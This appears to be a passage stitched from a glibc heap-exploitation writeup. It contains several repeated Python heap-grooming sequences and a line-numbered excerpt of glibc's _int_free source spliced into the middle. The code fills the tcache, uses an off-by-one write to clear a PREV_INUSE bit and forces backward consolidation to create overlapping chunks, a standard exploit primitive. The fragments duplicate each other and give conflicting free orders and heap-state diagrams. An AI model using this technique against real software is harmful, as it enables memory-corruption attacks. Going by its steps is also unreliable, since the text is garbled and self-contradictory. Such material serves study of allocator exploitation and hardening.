# Allocate ten 0x18-usable chunks (indices 0-9), each tagged with its index.
for idx in range(7):
    malloc(0x10, str(idx) * 0x7)
for idx in range(3):
    malloc(0x10, str(idx + 7) * 0x7)

# Fill six tcache slots with chunks 0-5.
for idx in range(6):
    free(idx)

free(9)  # seventh tcache entry — keeps chunk 8 away from top-chunk consolidation

# tcache for this size is now full, so chunks 6-8 land in the unsorted bin.
for idx in range(6, 9):
    free(idx)

# heap state now:
#   tcache-0
#   tcache-1
#   tcache-2
#   tcache-3
#   tcache-4
#   tcache-5
#   unsorted-6
#   unsorted-7
#   unsorted-8
#   tcache-9
# Lay out ten small chunks back to back; each is filled with a marker
# byte so the chunks are easy to tell apart in a heap dump.
for n in range(7):
    malloc(0x10, str(n) * 0x7)
for n in range(3):
    malloc(0x10, str(n + 7) * 0x7)
# Fill the tcache with chunks 0-5 so later frees use the unsorted bin.
for n in range(6):
    free(n)

free(8)
free(7)  # chunk 9's prev_size field is now 0x200 (7+8 merged ahead of it)

malloc(0xf8, str(8) * 0x7)  # off-by-one write clears chunk 9's PREV_INUSE bit

free(6)  # goes to tcache, leaving the unsorted-bin consolidation path usable
free(9)  # backward consolidation over the (still-allocated) chunk 8 → overlap
# heap state now:
#   chunk-6  tcache
#   chunk-5  tcache
#   chunk-4  tcache
#   chunk-3  tcache
#   chunk-2  tcache
#   chunk-1  tcache
#   chunk-7  unsorted — chunks 7-9 consolidated; chunk 8 sits inside this big free chunk
#   chunk-8  still in use — this is the overlapping chunk
#   chunk-9  unsorted (merged into chunk 7)
#   chunk-0  tcache
# heap state at this point:
#   chunk-6  tcache
#   chunk-5  tcache
#   chunk-4  tcache
#   chunk-3  tcache
#   chunk-2  tcache
#   chunk-1  tcache
#   chunk-7  unsorted — chunks 7-9 consolidated; chunk 8 sits inside the big free chunk
#   chunk-8  still in use — this is the overlap
#   chunk-9  unsorted (merged into chunk 7)
#   chunk-0  tcache

# Drain the seven tcache entries ...
for n in range(7):
    malloc(0x10, str(n + 1) * 0x7)
# ... then this allocation is carved from the consolidated unsorted chunk,
# i.e. it overlaps the still-allocated chunk 8.
malloc(0x10, str(0x8))
4194    ------------------------------ free ------------------------------
4195 */
4196
4197 static void
4198 _int_free (mstate av, mchunkptr p, int have_lock)
4199 {
4200   INTERNAL_SIZE_T size;        /* its size */
4201   mfastbinptr *fb;             /* associated fastbin */
4202   mchunkptr nextchunk;         /* next contiguous chunk */
4203   INTERNAL_SIZE_T nextsize;    /* its size */
4204   int nextinuse;               /* true if nextchunk is used */
4205   INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
4206   mchunkptr bck;               /* misc temp for linking */
4207   mchunkptr fwd;               /* misc temp for linking */
4208
4209   size = chunksize (p);
4210
4211   /* Little security check which won't hurt performance: the
4212      allocator never wrapps around at the end of the address space.
4213      Therefore we can exclude some size values which might appear
4214      here by accident or by "design" from some intruder. */
4215   if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
4216       || __builtin_expect (misaligned_chunk (p), 0))
4217     malloc_printerr ("free(): invalid pointer");
4218   /* We know that each chunk is at least MINSIZE bytes in size or a
4219      multiple of MALLOC_ALIGNMENT. */
4220   if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
4221     malloc_printerr ("free(): invalid size");
4222
4223   check_inuse_chunk(av, p);
4224
4225 #if USE_TCACHE
4226   {
4227     size_t tc_idx = csize2tidx (size);
4228
4229     /* Check to see if it's already in the tcache. */
4230     tcache_entry *e = (tcache_entry *) chunk2mem (p);
4231
4232     /* This test succeeds on double free. However, we don't 100%
4233        trust it (it also matches random payload data at a 1 in
4234        2^<size_t> chance), so verify it's not an unlikely coincidence
4235        before aborting. */
4236     if (__glibc_unlikely (e->key == tcache && tcache))
4237       {
4238         tcache_entry *tmp;
4239         LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
4240         for (tmp = tcache->entries[tc_idx];
4241              tmp;
4242              tmp = tmp->next)
4243           if (tmp == e)
4244             malloc_printerr ("free(): double free detected in tcache 2");
4245         /* If we get here, it was a coincidence. We've wasted a few
4246            cycles, but don't abort. */
4247       }
4248
4249     if (tcache
4250         && tc_idx < mp_.tcache_bins
4251         && tcache->counts[tc_idx] < mp_.tcache_count)
4252       {
4253         tcache_put (p, tc_idx);
4254         return;
4255       }
4256   }
4257 #endif
def exp():
    """Heap-grooming stage: allocate ten chunks, fill the tcache, and push
    chunks 6-8 into the unsorted bin (chunk 9 blocks top-chunk consolidation).

    Relies on the writeup's project helpers:
      malloc(size, data) -- allocate a chunk of `size` and write `data` into it
      free(idx)          -- free the chunk at allocation index `idx`
    """
    # NOTE(review): original read `defexp():` — missing space after `def`,
    # a SyntaxError; fixed to `def exp():`.

    # Allocate ten 0x18-usable chunks, each tagged with its index byte.
    for i in range(7):
        malloc(0x10, str(i) * 0x7)
    for i in range(3):
        malloc(0x10, str(i + 7) * 0x7)

    # Fill six tcache slots with chunks 0-5.
    for i in range(6):
        free(i)

    free(9)  # seventh tcache entry — avoids top-chunk consolidation of chunk 8

    # tcache for this size is now full, so chunks 6-8 go to the unsorted bin.
    for i in range(6, 9):
        free(i)

    # heap state now:
    #   tcache-0
    #   tcache-1
    #   tcache-2
    #   tcache-3
    #   tcache-4
    #   tcache-5
    #   unsorted-6
    #   unsorted-7
    #   unsorted-8
    #   tcache-9
# Carve out ten adjacent chunks; the comment below records where each
# allocation index lands in the heap.
for k in range(7):
    malloc(0x10, str(k) * 0x7)
for k in range(3):
    malloc(0x10, str(k + 7) * 0x7)
# heap layout:
#   chunk-6
#   chunk-5
#   chunk-4
#   chunk-3
#   chunk-2
#   chunk-1
#   chunk-7
#   chunk-8
#   chunk-9
#   chunk-0
# Fill the tcache with chunks 0-5 so subsequent frees reach the unsorted bin.
for k in range(6):
    free(k)

free(8)
free(7)  # chunk 9's prev_size field now reads 0x200 (7+8 merged before it)

malloc(0xf8, str(8) * 0x7)  # off-by-one write clears chunk 9's PREV_INUSE bit

free(6)  # tcache free — keeps the unsorted-bin consolidation path open
free(9)  # backward consolidation over chunk 8 → overlapping free chunk

# heap state now:
#   chunk-6  tcache
#   chunk-5  tcache
#   chunk-4  tcache
#   chunk-3  tcache
#   chunk-2  tcache
#   chunk-1  tcache
#   chunk-7  unsorted — 7-9 consolidated; chunk 8 lies inside the big free chunk
#   chunk-8  still in use — this is the overlap
#   chunk-9  unsorted (merged into chunk 7)
#   chunk-0  tcache

# Drain the seven tcache entries ...
for k in range(7):
    malloc(0x10, str(k + 1) * 0x7)
# ... then this allocation comes from the consolidated chunk, overlapping chunk 8.
malloc(0x10, str(0x8))

# heap state now:
#   chunk-1
#   chunk-2
#   chunk-3
#   chunk-4
#   chunk-5
#   chunk-6
#   chunk-8
#   chunk-0
#
#   chunk-7